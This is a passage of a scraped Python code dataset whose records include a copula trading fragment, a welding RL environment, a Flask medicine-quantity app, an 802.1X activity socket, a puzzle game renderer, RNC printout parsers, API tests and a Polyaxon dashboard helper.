(record.floor+0.1))\n record['short_exit'][-1] = True\n \n #shift n down\n #for i in range(5):\n # record['long_entry'] = record['long_entry'] | record['long_entry'].shift(i)\n # record['short_entry'] = record['short_entry'] | record['short_entry'].shift(i)\n \n return record\n \n def _parameter(self, family, tau):\n ''' Estimate the parameters for three kinds of Archimedean copulas\n according to association between Archimedean copulas and the Kendall rank correlation measure\n '''\n\n if family == 'clayton':\n return 2 * tau / (1 - tau)\n\n elif family == 'frank':\n\n '''\n debye = quad(integrand, sys.float_info.epsilon, theta)[0]/theta is first order Debye function\n frank_fun is the squared difference\n Minimize the frank_fun would give the parameter theta for the frank copula \n ''' \n integrand = lambda t: t / (np.exp(t) - 1) # generate the integrand\n frank_fun = lambda theta: ((tau - 1) / 4.0 -(ig.quad(integrand, sys.float_info.epsilon, theta)[0] \\\n / theta - 1) / theta) ** 2\n\n return minimize(frank_fun, 4, method='BFGS', tol=1e-5).x \n\n elif family == 'gumbel':\n return 1 / (1 - tau)\n\n def _lpdf_copula(self, family, theta, u, v):\n\n if family == 'clayton':\n pdf = (theta + 1) * ((u ** (-theta) + v ** (-theta) - 1) ** (-2 - 1 / theta)) *\\\n (u ** (-theta - 1) * v ** (-theta - 1))\n\n elif family == 'frank':\n num = -theta * (np.exp(-theta) - 1) * (np.exp(-theta * (u + v)))\n denom = ((np.exp(-theta * u) - 1) * (np.exp(-theta * v) - 1) + (np.exp(-theta) - 1)) ** 2\n pdf = num / denom\n\n elif family == 'gumbel':\n A = (-np.log(u)) ** theta + (-np.log(v)) ** theta\n c = np.exp(-A ** (1 / theta))\n pdf = c * (u * v) ** (-1) * (A ** (-2 + 2 / theta)) * ((np.log(u) * np.log(v)) \\\n ** (theta - 1)) * (1 + (theta - 1) * A ** (-1 / theta))\n return np.log(pdf)\n\n def _misprice_index(self, family, theta, u, v):\n\n if family == 'clayton':\n MI_u_v = v**(-theta-1) * (u**(-theta)+v**(-theta)-1)**(-1/theta-1) # P(U RS_MAX:\n # self.Rs = RS_MIN\n # elif self.Rs < RS_MIN:\n # self.Rs = RS_MAX\n\n # action is to revise the pid control with the DDPG method\n #self.Rs += learning_rate * action[0]\n #self.Ws -= learning_rate * action[1]\n # if self.Rs > 8 or self.Rs < 3 or self.Ws > 15 or self.Ws < 5:\n # self.Rs = np.random.uniform(3, 8, size=1)\n # self.Ws = np.random.uniform(5, 15, size=1)\n self.Rs = np.clip(self.Rs, 3, 8)\n self.Ws = np.clip(self.Ws, 5, 15)\n # update the history of Rs\n # index = int(self.counter % mylstm.TIMESTEPS)\n # print(index)\n self.Rs_list.append(self.Rs[0]) ## wrong ???\n self.Ws_list.append(self.Ws[0])\n # model\n # self.H_prediction = - self.Rs * 1.62 + self.Ws * 0.9 + 11.6\n # if self.counter < mylstm.TIMESTEPS:\n # self.H_prediction = 0\n # else:\n #\n self.H_prediction = mylstm.welding_pred(self.Rs_list[-mylstm.TIMESTEPS:], self.Ws_list[-mylstm.TIMESTEPS:])\n print(self.Rs_list[-1 : ], self.Ws_list[-1 : ], self.H_prediction, self.target)\n\n # reward\n if abs(self.target - self.H_prediction) < 0.05:\n self.on_goal += 1\n r = 1\n if self.on_goal > 80:\n done = True\n else:\n r = 1 / (1 + np.exp(abs(self.target - self.H_prediction))) - 0.5\n self.on_goal = 0\n # state\n s = np.hstack((self.error , self.del_error, self.Rs, self.Ws))\n #print(s,r)\n return s, r, done\n\n # set the initilize values\n def reset(self):\n self.error = 0\n self.del_error = 0\n self.error_last = 0\n self.Rs = 3\n self.Ws = 15\n #self.Wf = 10\n self.H_prediction = np.random.uniform(low=H_MIN, high=H_MAX, size=1)\n self.target = np.random.uniform(low=H_MIN, high=H_MAX, size=1)\n # 
self.target = 7.5\n # self.H_prediction = 5.5\n #s = np.concatenate((self.error, self.del_error, self.Rs))\n s = np.hstack((self.error, self.del_error, self.Rs, self.Ws))\n return s\n\n\n def render(self):\n if self.viewer is None:\n self.viewer = Viewer(self.H_prediction, self.target)\n\n self.viewer.render(self.H_prediction, self.target)\n\n def sample_action(self):\n return np.random.rand(2) - 0.5\n\n\n\nclass Viewer(pyglet.window.Window):\n\n def __init__(self, Y_t, goal):\n # vsync=False to not use the monitor FPS, we can speed up training\n super(Viewer, self).__init__(width=400, height=400, resizable=False, caption='Arm', vsync=False)\n pyglet.gl.glClearColor(1, 1, 1, 1)\n self.Y_t = Y_t\n # print(\"init\")\n self.goal_info = goal\n\n self.batch = pyglet.graphics.Batch() # display whole batch at once\n self.goal = self.batch.add(\n 4, pyglet.gl.GL_QUADS, None, # 4 corners\n ('v2f', [100, 100 + self.goal_info, # location\n 100, 105 + self.goal_info,\n 300, 105 + self.goal_info,\n 300, 100 + self.goal_info]),\n ('c3B', (86, 109, 249) * 4)) # color\n self.arm1 = self.batch.add(\n 4, pyglet.gl.GL_QUADS, None,\n ('v2f', [250, 250, # location\n 250, 255,\n 255, 255,\n 255, 250]),\n ('c3B', (249, 86, 86) * 4,)) # color\n\n def render(self, H_prediction, target):\n self.Y_t = H_prediction\n self._update_arm(H_prediction, target)\n self.switch_to()\n self.dispatch_events()\n self.dispatch_event('on_draw')\n self.flip()\n # print(self.goal_info['h'])\n\n def on_draw(self):\n self.clear()\n self.batch.draw()\n\n def _update_arm(self, H_prdiction, target):\n # update goal\n\n self.goal.vertices = (\n 100, 100 + target * 10,\n 100, 105 + target * 10,\n 300, 105 + target * 10,\n 300, 100 + target * 10)\n\n # update arm\n #height = self.Y_t\n #print(H_prdiction)\n self.arm1.vertices = (\n 195, 100 + H_prdiction * 10,\n 195, 105 + H_prdiction * 10,\n 205, 105 + H_prdiction * 10,\n 205, 100 + H_prdiction * 10)\n\nif __name__ == '__main__':\n env = Welding_Env()\n while True:\n print(\"new epoch\")\n s = env.reset()\n for i in range(100):\n env.render()\n env.step(env.sample_action())\n time.sleep(0.01)\n\n\n\n\n\n","sub_path":"New_env.py","file_name":"New_env.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"213187909","text":"import psycopg2\r\nimport psycopg2.extras\r\n\r\nfrom flask import Flask, redirect, url_for, request, render_template\r\napp = Flask(__name__)\r\n\r\n@app.route('/success/')\r\ndef success(name):\r\n conn = None\r\n try:\r\n print('Connecting to the PostgreSQL database...')\r\n conn = psycopg2.connect(host=\"localhost\",database=\"postgres\", user=\"postgres\", password=\"poojasvi\")\r\n # create a cursor\r\n cur = conn.cursor()\r\n print(\"Connection established\")\r\n\r\n except (Exception, psycopg2.DatabaseError) as error:\r\n print(error) \r\n\r\n try:\r\n # execute a statement\r\n # a=\"RHAFUVJTG\"\r\n a=name\r\n sql = \"\"\"SELECT \"Quantity\" FROM medicines WHERE \"Medicine\" = %s ; \"\"\"\r\n # cur.execute(sql)\r\n cur.execute(sql,(a,))\r\n print(\"select executed\")\r\n print(cur.rowcount)\r\n res=cur.fetchone()[0]\r\n print(res)\r\n \r\n conn.commit()\r\n \r\n except (Exception, psycopg2.DatabaseError) as error:\r\n print(error)\r\n\r\n finally:\r\n cur.close()\r\n if conn is not None:\r\n conn.close()\r\n print('Database connection closed.') \r\n # return str(res)\r\n return render_template('get_med_qty.html', qty = str(res), e=1)\r\n\r\n@app.route('/med',methods = 
['POST', 'GET'])\r\ndef med():\r\n    if request.method == 'POST':\r\n        med = request.form['med']\r\n        return redirect(url_for('success',name = med))\r\n    else:\r\n        # GET requests carry the value in the query string, not in the form body\r\n        med = request.args.get('med', '')\r\n        return redirect(url_for('success',name = med))\r\n\r\nif __name__ == '__main__':\r\n   app.run(debug = True)","sub_path":"get_med_qty.py","file_name":"get_med_qty.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"366530624","text":"\"\"\"Handle activity that is not EAP on the same EAP interface\"\"\"\n\nimport struct\nfrom fcntl import ioctl\nfrom eventlet.green import socket\n\nfrom chewie.mac_address import MacAddress\n\nclass ActivitySocket:\n    \"\"\"Handle the non-EAP activity socket\"\"\"\n    SIOCGIFINDEX = 0x8933\n    PACKET_MR_PROMISC = 1\n    IP_ETHERTYPE = 0x0800\n    SOL_PACKET = 263\n    PACKET_ADD_MEMBERSHIP = 1\n\n    DHCP_UDP_SRC = 68\n    DHCP_UDP_DST = 67\n    UDP_IPTYPE = b'\\x11'\n    EAP_ADDRESS = MacAddress.from_string(\"01:80:c2:00:00:03\")\n\n    def __init__(self, interface_name):\n        self.socket = None\n        self.interface_name = interface_name\n        self.interface_index = None\n\n    def setup(self):\n        \"\"\"Set up the socket\"\"\"\n        self.open()\n        self.get_interface_index()\n        self.set_interface_promiscuous()\n\n    def send(self, data):\n        \"\"\"Not Implemented -- This socket is purely for Listening\"\"\"\n        raise NotImplementedError('Attempted to send data down the activity socket')\n\n    def receive(self):\n        \"\"\"Receive activity from supplicant-facing socket\"\"\"\n        # Skip all packets that are not DHCP requests\n        while True:\n            ret_val = self.socket.recv(4096)\n\n            if ret_val[23:24] == self.UDP_IPTYPE:\n                src_port = struct.unpack('>H', ret_val[34:36])[0]\n                dst_port = struct.unpack('>H', ret_val[36:38])[0]\n\n                if src_port == self.DHCP_UDP_SRC and dst_port == self.DHCP_UDP_DST:\n                    return ret_val\n\n    def open(self):\n        \"\"\"Listen on the Socket for any form of Eth() / IP() frames \"\"\"\n        self.socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW,  # pylint: disable=no-member\n                                    socket.htons(self.IP_ETHERTYPE))  # pylint: disable=no-member\n        self.socket.bind((self.interface_name, 0))\n\n    def get_interface_index(self):\n        \"\"\"Get the interface index of the Socket\"\"\"\n        # http://man7.org/linux/man-pages/man7/netdevice.7.html\n        request = struct.pack('16sI', self.interface_name.encode(\"utf-8\"), 0)\n        response = ioctl(self.socket, self.SIOCGIFINDEX, request)\n        _ifname, self.interface_index = struct.unpack('16sI', response)\n\n    def set_interface_promiscuous(self):\n        \"\"\"Sets the activity interface to be able to receive messages with port_id in mac_dst\"\"\"\n        request = struct.pack(\"IHH8s\", self.interface_index, self.PACKET_MR_PROMISC,\n                              len(self.EAP_ADDRESS.address), self.EAP_ADDRESS.address)\n\n        self.socket.setsockopt(self.SOL_PACKET, self.PACKET_ADD_MEMBERSHIP, request)\n","sub_path":"chewie/activity_socket.py","file_name":"activity_socket.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"551071272","text":"# Copyright 2014 by Ethan Fritz. 
All Rights Reserved.\r\n\r\n\r\nclass Sound:\r\n    def __init__(self, sound, text, image):\r\n        self.sound = sound\r\n        self.text = text\r\n        self.image = image\r\n\r\n#\r\n# Constants\r\n#\r\nSOUNDS = [Sound('sfx/vroom.wav', 'Vroom', 'images/vroom.png'),\r\n          Sound('sfx/screech.wav', 'Screech', 'images/screech.png')]\r\n\r\n\r\ndef get_sound_by_id(sound_id):\r\n    # Sound objects carry no 'id' attribute, so treat the id as an index into SOUNDS\r\n    if 0 <= sound_id < len(SOUNDS):\r\n        return SOUNDS[sound_id]\r\n\r\n    return None\r\n","sub_path":"core/sound.py","file_name":"sound.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"361484119","text":"# -*- coding : utf-8 -*-\n\n#------------------------------------------------------------------------\n# LIB IMPORT\n#------------------------------------------------------------------------\n\nimport eventHandler\nimport pygame\nimport loading\nfrom pygame.locals import *\nfrom classes.box import Box\nfrom classes.cell import Cell\nfrom classes.scrolls import Scrolls\nfrom classes.level import Level\nfrom classes.player import Player\n\n#------------------------------------------------------------------------\n# GLOBAL VARIABLE\n#------------------------------------------------------------------------\n\n\"\"\"\n\n:firstPixel: the first pixel of the width where the game (and not the screen) has to be displayed\n:playerAction: action that the player chooses in the titleScreen : string\n\n\"\"\"\n\nfirstPixel = None\nplayerAction = None\n\n#------------------------------------------------------------------------\n# METHODS\n#------------------------------------------------------------------------\n\ndef displayTitleScreen(titleScreenImgPath, window):\n    \"\"\"Method where I set how the title screen is displayed \"\"\"\n\n    playerAction = \"\"\n\n    #Setting the image for the title screen\n    #window = pygame.display.set_mode((640,480))\n    titleScreen = pygame.image.load(titleScreenImgPath).convert()\n    window.blit(titleScreen, (0,0))\n\n    #Setting the new game button for the title screen\n    \"\"\"newGame = pygame.image.load(\"resources/img/new_game_resized.png\").convert()\n    window.blit(newGame, (320, 240))\"\"\"\n    pygame.display.flip()\n\n    continuer = 1\n\n    #Display the title screen as long as the player presses the wrong key\n    while continuer:\n        for event in pygame.event.get():\n            \n            if event.type == KEYDOWN: \n                playerAction = eventHandler.eventTitleScreen(event)\n                continuer = loading.exitTitleScreen(playerAction)\n            \n            elif event.type == QUIT:\n                playerAction = \"Quit_the_game\"\n                continuer = 0\n\n    return playerAction\n    \ndef displayGrille(level, firstPixel, window):\n    \"\"\"We place all elements on the table\n\n    Attributes:\n    :firstPixel: first pixel to display on the width of the screen to get the game centered in the window\n    :window: pygame.Surface object where the game is displayed\n    \"\"\"\n\n    for row in level._get_grille():\n        for cell in row:\n            if cell.element is not None:\n                pos_x = firstPixel + (cell.pos_x * 30)\n                pos_y = cell.pos_y * 30\n                elementPNG = pygame.image.load(cell.element.skin).convert_alpha()\n                window.blit(elementPNG, (pos_x, pos_y))\n\n            else:\n                pass\n\n    \ndef displayLevel(numLevel, window):\n    \"\"\"Display the level the player has selected \"\"\"\n    print(\"Loading level \"+str(numLevel))\n    loadLevel = True\n\n    #While we need to reload the same level (for restart or a death for example)\n    #We reload it\n    while loadLevel == True:\n        #String that will go back to main and lets the program know what to do next\n        #Go to next level? 
Quit the game?\n action = \"\"\n \n #We create the object Level and load its elements\n level = Level(numLevel)\n\n #If it couldn't find a level in levelFile, it means the game is finished and\n #we display the title screen\n if level.csvPath is None:\n return \"Title_Screen\"\n else:\n level.loadingLevelForDisplay()\n\n #We calculate where should be the center of the game on the screen in order\n #to display correctly all elements\n gameWidth = len(level._get_grille()[0]) * 30\n firstPixel = centerTheGameOnTheScreen(window.get_width(), gameWidth)\n\n #We set a new background image\n window.fill(pygame.Color(\"black\"))\n background = pygame.image.load(\"resources/img/fond.jpg\").convert()\n window.blit(background, (firstPixel,0))\n pygame.display.flip()\n\n #We place each element with their pixels position on the screen\n displayGrille(level, firstPixel, window)\n\n #We place the player on the table\n player = Player()\n playerPNG = pygame.image.load(player.character.skin).convert_alpha()\n player.positionRect = playerPNG.get_rect(x = level.start[0], y = level.start[1])\n \n window.blit(playerPNG, (firstPixel+player.positionRect.x*30, player.positionRect.y*30))\n pygame.display.flip()\n \n continuer = 1\n\n #We display the level while the player hasn't finished it\n while continuer:\n\n #We display background and elements of the level again\n window.fill(pygame.Color(\"Black\"))\n\n #We load the background image\n window.blit(background, (firstPixel,0))\n\n #We load the table of elements with their graphics\n displayGrille(level, firstPixel, window)\n\n #We load the player character (donkey kong)\n playerPNG = pygame.image.load(player.character.skin).convert_alpha()\n window.blit(playerPNG, (firstPixel + player.positionRect.x * 30, player.positionRect.y*30))\n\n #If the player walked on a scroll, we display its message\n level.checkPlayerOnScroll(player, window)\n\n pygame.display.flip()\n \n for event in pygame.event.get():\n if event.type == QUIT:\n action = \"Quit_the_game\"\n loadLevel = False\n continuer = 0\n\n #If the player presses a key, we check if he can move\n elif event.type == KEYDOWN:\n if event.key == K_r:\n continuer = 0\n elif event.key == K_LEFT or event.key == K_RIGHT or event.key == K_UP or event.key == K_DOWN:\n #If the player will move on a cell where there is a box\n potentialBox = level.checkPlayerBoxes(player, event)\n if potentialBox is not None:\n box = potentialBox\n if box.canMove(player, level, event):\n player.move(level, event)\n\n else:\n player.move(level, event)\n\n #If the player dies, he goes back to the starting point of the current level\n if level.checkPlayerDies(player):\n continuer = 0\n \n #If player walks on the finish line, he goes to next level\n if level.checkEndLevel(player):\n continuer = 0\n loadLevel = False\n action = \"Next_level\"\n\n return action\n \n\n\ndef displayLevelSelection(window):\n \"\"\"Screen where all the levels unlocked are listed \"\"\"\n numberOfLevels = loading.howManyLevels()\n\n for x in range(0, numberOfLevels):\n messageFont = pygame.font.SysFont(\"comicsansms\", 18)\n messageRender = messageFont.render(\"Niveau \"+str(x+1), True, (255,255,255))\n window.blit(messageRender, (0,450))\n pygame.display.flip()\n \n\ndef centerTheGameOnTheScreen(windowWidth, gameWidth):\n \"\"\"Method that calculates where the first pixel of the width of the game\n has to be in order to have the game centered on the screen\n\n Attributes:\n :windowWidth: width of the window : int\n :gameWidth: width of the game : int \n \"\"\"\n\n 
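# Worked example: a 640 px window with a 15-cell-wide grid (15 * 30 = 450 px) leaves 190 px of blank space, so the grid's first pixel lands at x = 95 and the level is horizontally centered.\n    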
blankSpace = windowWidth - gameWidth\n firstPixel = blankSpace / 2\n \n return firstPixel\n\n \n","sub_path":"displayDK.py","file_name":"displayDK.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"307991978","text":"import re\nimport datetime\nfrom models.db_tables import PmrReport\n\nRE_FINGERPRINT = re.compile(r'Licensing=.+fingerprint +(\\w+)')\nRE_NODE_NAME = re.compile(r'\\S+ = (.+)')\nRE_PRODUCT_NAME = re.compile(r'productName +(.+)')\nRE_RNC_CAPACITY = re.compile(r'(MO .+|Object .+|Licensing=.+)')\nRE_PM_CAPACITY = re.compile(r'Licensing=1\\D+([\\d,]+)\\s+(\\d+)')\nRE_SUBRACKS = re.compile(r'Subrack=(.+)')\nRE_SUBRACK_SLOT = re.compile(r'Subrack=(.+),Slot=(\\d{1,2})')\nRE_SLOT_STATE = re.compile(r'(MO .+|Subrack=.+)')\nRE_DEVICE_STATE = re.compile(r'((?:Type|PDR|CC|DC).+)')\nRE_ETHERNET_PORT = re.compile(r'Subrack=(.+),Slot=(\\d{1,2}),.+Port=(\\d).+\\((\\w+)')\nRE_LOAD_CONTROL = re.compile(r'((?:Object |Subrack=).+)')\nRE_LOAD_CONTROL_ENTRY = re.compile(r'Subrack=(.+),Slot=(\\d{1,2}),.+LoadControl=1\\s+(.+)')\nRE_PMR_REPORT_PART = re.compile(r'(?:Object\\s+Counter|Date\\s+Time\\s+Counter).+', re.M)\nRE_PMR_REPORT_ENTRY = re.compile(r'^(?P.+)\\s+(?P(?:Mp|Cc|Dc|Pdr)Load|UsedCapacity)\\s+(?P.+)', re.M)\nRE_PMR_REPORT_START = re.compile(r'\\s?\\d{1,3}\\)\\sRNC\\s')\nRE_LKRA = re.compile(r'(?:Sr|[ME]S).+')\nRE_LKRA_ENTRY = re.compile(\n r'(?P^[ME]S\\d?)\\s+(?P\\d+)\\s+(?P\\S+)\\s+(?P[\\w\\d]+)?\\s+(?P\\d+)\\s+(?P\\d+)\\s+(?P\\d+)\\s+(?P\\d+)')\n\nCURRENT_CAPACITY = 'currentCapacityLimit'\n\n\ndef get_fingerprint(cmd_printout):\n return RE_FINGERPRINT.findall(cmd_printout)[0]\n\n\ndef get_nodeName(cmd_printout):\n try:\n return RE_NODE_NAME.findall(cmd_printout)[0]\n except IndexError:\n return None\n\n\ndef get_productName(cmd_printout):\n try:\n return RE_PRODUCT_NAME.findall(cmd_printout)[0]\n except IndexError:\n return None\n\n\ndef get_rncCapacity(cmd, cmd_printout):\n rncCapacity = {}\n attributes = []\n re_cmd_printout = RE_RNC_CAPACITY.findall(cmd_printout)\n for i in range(len(re_cmd_printout)):\n if i == 0:\n attributes = re_cmd_printout[i].split()[1:]\n else:\n record = re.sub(r'\\(|\\)', '', re_cmd_printout[i].strip('Licensing=1,RncCapacity=')).split()\n k = record[0]\n if CURRENT_CAPACITY in cmd:\n v = dict(zip(attributes, record[2:]))\n else:\n v = dict(zip(attributes, record[1:]))\n rncCapacity.update({k: v})\n return rncCapacity\n\n\ndef get_slotState(slots, cmd_printout):\n re_cmd_printout = RE_SLOT_STATE.findall(cmd_printout)\n for i in range(len(re_cmd_printout)):\n if i == 0:\n # attributes = re_cmd_printout[i].split()[1:]\n pass\n else:\n slotState = re.sub(r'\\(|\\)', '', re_cmd_printout[i].split()[-1])\n board = re_cmd_printout[i].split()[0]\n attribute = re_cmd_printout[i].split()[1]\n subrack, slot = RE_SUBRACK_SLOT.findall(board)[0]\n if subrack not in slots.keys():\n slots.update({subrack: {}})\n if slot not in slots.get(subrack).keys():\n slots.get(subrack).update({slot: {}})\n slots.get(subrack).get(slot).update({attribute: slotState})\n\n\ndef get_deviceState(cmd_printout):\n re_cmd_printout = RE_DEVICE_STATE.findall(cmd_printout)[-4:]\n deviceStates = {}\n attributes = []\n for i in range(len(re_cmd_printout)):\n if i == 0:\n s = re.sub('%|\\(.\\)', '', re_cmd_printout[i])\n attributes = s.split()[1:]\n else:\n entry = re_cmd_printout[i].split()\n k = entry[0]\n v = dict(zip(attributes, entry[1:]))\n if k not in deviceStates.keys():\n deviceStates.update({k: 
{}})\n deviceStates.get(k).update(v)\n return deviceStates\n\n\ndef get_ethernet_speed(cmd_printout):\n re_cmd_printout = RE_ETHERNET_PORT.findall(cmd_printout)\n ports = {}\n for i in range(len(re_cmd_printout)):\n port = '-'.join(re_cmd_printout[i][:-1])\n speed = re_cmd_printout[i][-1]\n ports.update({port: speed})\n return ports\n\n\ndef get_loadcontrol(cmd_printout):\n re_cmd_printout = RE_LOAD_CONTROL.findall(cmd_printout)\n result = {}\n attributes = []\n for i in range(len(re_cmd_printout)):\n if i == 0:\n attributes = re_cmd_printout[i].split()[1:]\n else:\n entry = re_cmd_printout[i]\n subrack, slot, counters = RE_LOAD_CONTROL_ENTRY.findall(entry)[0]\n slot = int(slot)\n counters = counters.split()\n if subrack not in result.keys():\n result.update({subrack: {}})\n if slot not in result.get(subrack).keys():\n result.get(subrack).update({slot: {}})\n result.get(subrack).get(slot).update(dict(zip(attributes, counters)))\n return result\n\n\ndef get_lkra(cmd_printout):\n cell_repartition = 'Cell repartition by '\n repartion_by = ''\n lkra = {}\n result = {}\n\n for line in cmd_printout.splitlines():\n if cell_repartition in line:\n repartion_by = re.sub('{0}|{1}'.format(cell_repartition, ':'), '', line)\n if repartion_by not in lkra.keys():\n lkra.update({repartion_by: []})\n continue\n if repartion_by and RE_LKRA.findall(line):\n lkra.get(repartion_by).append(line)\n\n byRncModule = lkra.get('rncModule')\n column_names = byRncModule[0].split()[2:]\n\n for line in byRncModule[1:]:\n subrack, module = RE_LKRA_ENTRY.search(line).groups()[0:2]\n values = RE_LKRA_ENTRY.search(line).groups()[2:]\n module = int(module)\n values = [int(i) if i and i.isdigit() else i for i in values]\n if subrack not in result.keys():\n result.update({subrack: {}})\n if module not in result.get(subrack).keys():\n result.get(subrack).update({module: {}})\n result.get(subrack).get(module).update(dict(zip(column_names, values)))\n\n return result\n\n\ndef get_pmr(cmd_printout):\n\n def get_max_sum(*args):\n max_sum = max(sum(filter(None, j)) for j in map(None, *args[0]))\n if result[report_name]['max'] < max_sum:\n result[report_name]['max'] = max_sum\n for j in map(None, *args[0]):\n if sum(filter(None, j)) == max_sum:\n result[report_name]['v'] = list(j)\n if not result.get(report_name).get('devices'):\n result[report_name]['devices'] = devices\n\n def get_max_value(*args):\n try:\n result.update(dict(zip(args[1], [{'max': 0.0, 'v': []}, {'max': 0.0, 'v': []}])))\n m = {}\n vals = {}\n m.update(dict(zip(args[1], [max(filter(None, j)) for j in map(None, *args[0])])))\n vals.update(dict(zip(args[1], map(None, *args[0]))))\n time = [datetime.datetime.strptime(dt, '%Y-%m-%d %H:%M').time() for dt in args[2]][:24]\n for k in args[1]:\n time_sorted, vals_sorted = zip(*sorted(zip(time, vals.get(k))))\n time_hm = [hm.strftime(format='%H:%M') for hm in time_sorted]\n result.get(k).update({'max': m.get(k), 'v': list(vals_sorted), 'time': time_hm})\n except ValueError:\n result.update(dict(zip(args[1], [{'max': 0, 'v': '', 'time': ''}, {'max': 0, 'v': '', 'time': ''}])))\n\n result.pop(report_name)\n\n def get_device(d):\n if re_mp.findall(d):\n sr, sl = re_mp.search(d).groups()\n d = '-'.join([sr.replace('-', ''), sl])\n elif re_dev.findall(d):\n dev, srsl = re_dev.search(d).groups()\n d = '-'.join([srsl, dev])\n return d\n\n result = {}\n report_name = ''\n headers = []\n entry = []\n devices = []\n\n re_mp = re.compile(r'(?P[ME].+),Slot=(?P\\d+)')\n re_dev = 
re.compile(r'(?:Cc|Dc|Pdr)Device=(?P\\d+)\\s\\((?P.+)\\)')\n\n report_processors = {\n 'MpLoad': ['devices', get_max_sum, re_mp], 'CcLoad': ['devices', get_max_sum], 'DcLoad': ['devices', get_max_sum],\n 'PdrLoad': ['devices', get_max_sum], 'UsedCapacity': ['time', get_max_value]}\n\n for line in cmd_printout.splitlines():\n if line and RE_PMR_REPORT_PART.findall(line):\n headers = RE_PMR_REPORT_PART.findall(line)[0]\n continue\n\n if line and RE_PMR_REPORT_ENTRY.search(line):\n (device, report_name, values) = RE_PMR_REPORT_ENTRY.search(line).groups()\n device = get_device(device)\n if report_name not in result.keys():\n result.update({report_name: {'max': 0.0, 'v': [], report_processors.get(report_name)[0]: ''}})\n v = []\n v.extend(0.0 if i == 'N/A' else float(i) for i in values.split())\n entry.append(v)\n devices.append(device)\n continue\n\n if entry:\n headers = headers.split()[3:]\n report_processors.get(report_name)[1](entry, headers, devices)\n entry = []\n devices = []\n headers = ''\n\n pmr_todb = {\n 'IubThroughput': [PmrReport.IubThroughput.db_column, PmrReport.vIub.db_column, PmrReport.tIub.db_column],\n 'FachDchHsUsers': [PmrReport.FachDchHsUsers.db_column, PmrReport.vUsers.db_column, PmrReport.tUsers.db_column],\n 'MpLoad': [PmrReport.MpLoad.db_column, PmrReport.vMpLoad.db_column, PmrReport.dMpLoad.db_column],\n 'CcLoad': [PmrReport.CcLoad.db_column, PmrReport.vCcLoad.db_column, PmrReport.dCcLoad.db_column],\n 'DcLoad': [PmrReport.DcLoad.db_column, PmrReport.vDcLoad.db_column, PmrReport.dDcLoad.db_column],\n 'PdrLoad': [PmrReport.PdrLoad.db_column, PmrReport.vPdrLoad.db_column, PmrReport.dPdrLoad.db_column]}\n\n for k, v in pmr_todb.items():\n try:\n if result.get(k).get('devices') and result.get(k).get('v'):\n d_sorted, v_sorted = zip(*sorted(zip(result.get(k).get('devices'), result.get(k).get('v'))))\n result.update(\n dict(zip(v, [result.get(k).get('max'), list(v_sorted), list(d_sorted)])))\n elif result.get(k).get('devices'):\n result.update(\n dict(zip(v, [result.get(k).get('max'), result.get(k).get('v'), result.get(k).get('devices')])))\n\n else:\n result.update(\n dict(zip(v, [result.get(k).get('max'), result.get(k).get('v'), result.get(k).get('time')])))\n\n except AttributeError:\n result.update(dict(zip(v, [0.0, '', ''])))\n\n return result\n","sub_path":"modules/command_parsers.py","file_name":"command_parsers.py","file_ext":"py","file_size_in_byte":10386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360530806","text":"import pytest\nimport requests\n\n\ndef test_swagger():\n\n model_endpoint = 'http://localhost:5000/swagger.json'\n\n r = requests.get(url=model_endpoint)\n assert r.status_code == 200\n assert r.headers['Content-Type'] == 'application/json'\n\n json = r.json()\n assert 'swagger' in json\n assert json.get('info') and json.get('info').get('title') == 'Model Asset Exchange Server'\n\n\ndef test_metadata():\n\n model_endpoint = 'http://localhost:5000/model/metadata'\n\n r = requests.get(url=model_endpoint)\n assert r.status_code == 200\n\n metadata = r.json()\n assert metadata['id'] == 'ADD IN MODEL ID'\n assert metadata['name'] == 'ADD MODEL NAME'\n assert metadata['description'] == 'ADD MODEL DESCRIPTION'\n assert metadata['license'] == 'ADD MODEL LICENSE'\n\n\ndef test_response():\n model_endpoint = 'http://localhost:5000/model/predict'\n file_path = 'assets/SAMPLE_FILE.jpg'\n\n with open(file_path, 'rb') as file:\n file_form = {'image': (file_path, file, 'image/jpeg')}\n\n r = 
requests.post(url=model_endpoint, files=file_form)\n\n    assert r.status_code == 200\n    response = r.json()\n\n    assert response['status'] == 'ok'\n\n    # add sanity checks here\n\n\nif __name__ == '__main__':\n    pytest.main([__file__])\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"111467765","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\n\nimport click\n\nfrom polyaxon import settings\nfrom polyaxon.api import POLYAXON_CLOUD_HOST\nfrom polyaxon.logger import clean_outputs\nfrom polyaxon.utils.formatting import Printer\nfrom polyaxon.utils.http_utils import clean_host\n\n\ndef get_dashboard_url(\n    base: str = \"ui\", subpath: str = \"\", use_cloud: bool = False\n) -> str:\n    host = POLYAXON_CLOUD_HOST if use_cloud else clean_host(settings.CLIENT_CONFIG.host)\n    dashboard_url = \"{}/{}/\".format(host, base)\n    if subpath:\n        return \"{}{}/\".format(dashboard_url, subpath.rstrip(\"/\"))\n    return dashboard_url\n\n\ndef get_dashboard(dashboard_url: str, url_only: bool, yes: bool):\n    if url_only:\n        Printer.print_header(\"The dashboard is available at: {}\".format(dashboard_url))\n        sys.exit(0)\n    if yes or click.confirm(\n        \"Dashboard page will now open in your 